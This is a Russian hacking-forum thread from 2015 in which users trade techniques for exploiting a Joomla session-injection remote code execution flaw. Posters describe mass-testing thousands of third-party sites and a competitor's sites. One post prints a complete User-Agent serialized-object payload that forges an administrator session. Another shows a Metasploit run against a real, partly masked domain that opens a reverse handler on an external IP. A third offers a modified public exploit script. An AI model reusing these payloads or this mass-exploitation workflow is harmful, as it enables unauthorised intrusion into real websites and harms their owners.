ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.12.2015, 15:39
|
|
Познающий
Регистрация: 08.08.2009
Сообщений: 37
Провел на форуме:
162650
Репутация:
2
|
|
Марафон открыт)
|
|
|
16.12.2015, 15:51
|
|
Познавший АНТИЧАТ
Регистрация: 16.11.2004
Сообщений: 1,257
Провел на форуме:
1331503
Репутация:
454
|
|
Я то могу платно показать, как она работает, но
1. Пробивается не больше 5% сайтов. Почему - надо смотреть код Джумлы.
2. Есть куча левых фиксов, которые не позволяют выполнить это.
3. Тот же CloudFlare посылает ваши эксплоиты строго по компасу.
Вообщем так, сайты своих друзей и врагов я протестировал. Один дырявый у друзей уже пофиксил. Из числа конкурентов, к сожалению, никто не пробивается. Далее мне эта тема не интересна
|
|
|
|
16.12.2015, 16:09
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
у меня из 150 сайтов 18 пробило, все пробитые от 3.x и выше, щас на массовость буду смотреть по версиям на 8к сатов, что пробьется...
P.S: Тема очень обсуждаема, вынести бы ее в отдельную тему... модерам...
|
|
|
|
16.12.2015, 17:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
137056
Репутация:
11
|
|
В этой ссылке, которую приводили выше - https://github.com/rapid7/metasploit...work/pull/6355 описаны некоторые ограничения по версии php. Я пробовал эксплоит на хостах, с подходящими версиями - либо возвращается обычная страница, либо 403 или пустой ответ сервера. В двух последних случаях подозреваю WAF. Пока не ясно как с ним бороться. |
|
|
|
16.12.2015, 23:09
|
|
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854
Репутация:
622
|
|
класс JDatabaseDriverMysqli , нашёл только в версии 332, а вот где еть возможность записи в файл сессии так и не нашёл
83 public function __destruct()
84 {
85 $this->disconnect();
86 }
200 public function disconnect()
201 {
202 // Close the connection.
203 if ($this->connection)
204 {
205 foreach ($this->disconnectHandlers as $h)
206 {
207 call_user_func_array($h, array( &$this));
208 }
209
210 mysqli_close($this->connection);
211 }
212
213 $this->connection = null;
214 }
|
|
|
|
17.12.2015, 00:22
|
|
Познавший АНТИЧАТ
Регистрация: 16.11.2004
Сообщений: 1,257
Провел на форуме:
1331503
Репутация:
454
|
|
Что-то не варит котелок у меня уже. Если кто заставит это чудо пробивать версии линейки 2.5 просьба отписать сюди или в ЛС. С меня пиво.
|
|
|
|
17.12.2015, 01:19
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от vvs777
vvs777 said:
↑
Что-то не варит котелок у меня уже. Если кто заставит это чудо пробивать версии линейки 2.5 просьба отписать сюди или в ЛС. С меня пиво. Бьет только версию 3.x за счет:
Сообщение от None
public function __destruct()
{
$this->
disconnect
();
}
...
public
function disconnect
()
{
// Close the connection.
if ($this->connection)
{
foreach ($this->disconnectHandlers as $h)
{
call_user_func_array
($h, array( &$this));
}
mysqli_close($this->connection);
}
$this->connection = null;
}
а во второй ветки он прописан так:
Сообщение от None
public function __destruct()
{
if (is_callable(array($this->connection, 'close')))
{
mysqli_close($this->connection);
}
}
|
|
|
|
17.12.2015, 03:19
|
|
Познавший АНТИЧАТ
Регистрация: 16.11.2004
Сообщений: 1,257
Провел на форуме:
1331503
Репутация:
454
|
|
Тут вроде бы еще одна возможность намечается:
Проверил как в 3.4 выглядит сессия админа. С учетом вычищенного лишнего:
Сообщение от None
__default|a:8:{s:15:"session.counter";i:4;s:19:"se ssion.timer.start";i:1450305285;s:18:"session.time r.last";i:1450305301;s:17:"session.timer.now";i:14 50305303;s:22:"session.client.browser";s:3:"MOZ";s :8:"registry";O:24:"Joomla\Registry\Registry":2:{s :7:"\0\0\0data";O:8:"stdClass":0:{}s:9:"separator" ;s:1:".";}s:4:"user";O:5:"JUser":28:{s:9:"\0\0\0is Root";b:1;s:2:"id";s:1:"1";s:4:"name";s:6:"Hacker" ;s:8:"username";s:5:"admin";s:5:"email";s:1:"@";s: 8:"password";s:4:"SUXX";s:14:"password_clear";s:0: "";s:5:"block";s:1:"0";s:9:"sendEmail";s:1:"1";s:1 2:"registerDate";s:10:"2015-01-01";s:13:"lastvisitDate";s:19:"0000-00-00 00:00:00";s:10:"activation";s:1:"0";s:6:"params";s :0:"";s:6:"groups";a:1:{i:8;s:1:"8";}s:5:"guest";i :0;s:13:"lastResetTime";s:19:"0000-00-00 00:00:00";s:10:"resetCount";s:1:"0";s:12:"requireR eset";s:1:"0";s:10:"\0\0\0_params";O:24:"Joomla\Re gistry\Registry":2:{s:7:"\0\0\0data";O:8:"stdClass ":0:{}s:9:"separator";s:1:".";}s:14:"\0\0\0_authGr oups";a:2:{i:0;i:1;i:1;i:8;}s:14:"\0\0\0_authLevel s";a:5:{i:0;i:1;i:1;i:1;i:2;i:2;i:3;i:3;i:4;i:6;}s :15:"\0\0\0_authActions";N;s:12:"\0\0\0_errorMsg"; N;s:13:"\0\0\0userHelper";O:18:"JUserWrapperHelper ":0:{}s:10:"\0\0\0_errors";a:0:{}s:3:"aid";i:0;s:6 :"otpKey";s:0:"";s:4:"otep";s:0:"";}s:13:"session. token";s:2:"ff";}
Я сознательно поубирал всякий хлам. Если ЭТО внести непосредственно (руками) в таблицу session независимо от содержимого полей client_id и guest на главной странице появляется кнопка редактирования постов со всеми вытекающими. В админку я не попал, но думаю дело техники.
Теперь если не руками. Отправляю запрос со следующим User-Agent:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$uagent[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'";s:8:"registry";O:24:"Joomla\Registry\Registry":2:{s:7:"\0\0\0data";O:8:"stdClass":0:{}s:9:"separator";s:1:".";}s:4:"user";O:5:"JUser":28:{s:9:"\0\0\0isRoot";b:1;s:2:"id";s:1:"1";s:4:"name";s:6:"Hacker";s:8:"username";s:5:"admin";s:5:"email";s:1:"@";s:8:"password";s:4:"SUXX";s:14:"password_clear";s:0:"";s:5:"block";s:1:"0";s:9:"sendEmail";s:1:"1";s:12:"registerDate";s:10:"2015-01-01";s:13:"lastvisitDate";s:19:"0000-00-00 00:00:00";s:10:"activation";s:1:"0";s:6:"params";s:0:"";s:6:"groups";a:1:{i:8;s:1:"8";}s:5:"guest";i:0;s:13:"lastResetTime";s:19:"0000-00-00 00:00:00";s:10:"resetCount";s:1:"0";s:12:"requireReset";s:1:"0";s:10:"\0\0\0_params";O:24:"Joomla\Registry\Registry":2:{s:7:"\0\0\0data";O:8:"stdClass":0:{}s:9:"separator";s:1:".";}s:14:"\0\0\0_authGroups";a:2:{i:0;i:1;i:1;i:8;}s:14:"\0\0\0_authLevels";a:5:{i:0;i:1;i:1;i:1;i:2;i:2;i:3;i:3;i:4;i:6;}s:15:"\0\0\0_authActions";N;s:12:"\0\0\0_errorMsg";N;s:13:"\0\0\0userHelper";O:18:"JUserWrapperHelper":0:{}s:10:"\0\0\0_errors";a:0:{}s:3:"aid";i:0;s:6:"otpKey";s:0:"";s:4:"otep";s:0:"";}s:13:"session.token";s:2:"ff";}'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\xf0\x9d\x8c\x86"[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
В базу благополучно записывается такое значение сессии:
Сообщение от None
__default|a:8:{s:15:"session.counter";i:1;s:19:"se ssion.timer.start";i:1450307390;s:18:"session.time r.last";i:1450307390;s:17:"session.timer.now";i:14 50307390;s:22:"session.client.browser";
s:1088:""
;s:8:"registry";O:24:"Joomla\Registry\Registry":2: {s:7:"\0\0\0data";O:8:"stdClass":0:{}s:9:"separato r";s:1:".";}s:4:"user";O:5:"JUser":28:{s:9:"\0\0\0 isRoot";b:1;s:2:"id";s:1:"1";s:4:"name";s:6:"Hacke r";s:8:"username";s:5:"admin";s:5:"email";s:1:"@"; s:8:"password";s:4:"SUXX";s:14:"password_clear";s: 0:"";s:5:"block";s:1:"0";s:9:"sendEmail";s:1:"1";s :12:"registerDate";s:10:"2015-01-01";s:13:"lastvisitDate";s:19:"0000-00-00 00:00:00";s:10:"activation";s:1:"0";s:6:"params";s :0:"";s:6:"groups";a:1:{i:8;s:1:"8";}s:5:"guest";i :0;s:13:"lastResetTime";s:19:"0000-00-00 00:00:00";s:10:"resetCount";s:1:"0";s:12:"requireR eset";s:1:"0";s:10:"\0\0\0_params";O:24:"Joomla\Re gistry\Registry":2:{s:7:"\0\0\0data";O:8:"stdClass ":0:{}s:9:"separator";s:1:".";}s:14:"\0\0\0_authGr oups";a:2:{i:0;i:1;i:1;i:8;}s:14:"\0\0\0_authLevel s";a:5:{i:0;i:1;i:1;i:1;i:2;i:2;i:3;i:3;i:4;i:6;}s :15:"\0\0\0_authActions";N;s:12:"\0\0\0_errorMsg"; N;s:13:"\0\0\0userHelper";O:18:"JUserWrapperHelper ":0:{}s:10:"\0\0\0_errors";a:0:{}s:3:"aid";i:0;s:6 :"otpKey";s:0:"";s:4:"otep";s:0:"";}s:13:"session. token";s:2:"ff";}
Но как только я запрашиваю страницу браузером с той же кукой - заветной кнопки не вижу и в базу автоматически заносится
Сообщение от None
isRoot";b:0;s:2:"id";i:0;s:4:"name";N;s:8:"usernam e";N;
Если в структуре, занесенной в БД посредством подмены User-Agent заменить (уже в базе руками)
s:1088:""; на s:1:"1"; или что-либо еще корректное - то все работает и я получаю права автора на редактирование публикаций с сайта.
Сообщение от None
s:22:"session.client.browser";s:1126:"";s:22:"sess ion.client.browser";s:1:"1";
не катит
Если _default обрезать и дописать к нему второй _default - джумла потом дополняет первый как в предыдущем случае, а второй хвостом болтается. В версии 2.5 хвост превращается в __defaul2|N;
В исходники особо не вникал, но возможно что это можно раскрутить до получения прав автора админа. |
|
|
|
17.12.2015, 06:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
42754
Репутация:
0
|
|
Код:
Code:
msf exploit(joomla_http_header_rce) > set RHOST www.aquak***.ru
RHOST => www.aquak***.ru
msf exploit(joomla_http_header_rce) > check[*] www.aquak***.ru:80 - The target appears to be vulnerable.
msf exploit(joomla_http_header_rce) > exploit
[*] Started reverse handler on 188.227.**.**:4444[*] www.aquak***.ru:80 - Sending payload ...[*] Exploit completed, but no session was created.
msf exploit(joomla_http_header_rce) >
|
|
|
|
17.12.2015, 17:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
98300
Репутация:
31
|
|
Подкоректировал сплоит ( https://www.exploit-db.com/exploits/38977/), выкладываю, может кому-то пригодиться. Реально задолбался менять payload и URL в файле. Еще сделал запись результата в файл. Для работы нужна библиотека requests, ставить так:
Код:
Code:
pip install requests
P.S Ни разу не пробивал Jooml'y ): ")
pl = generate_payload(phpexec)
print get_url(vulnurl, pl)
[/CODE] |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
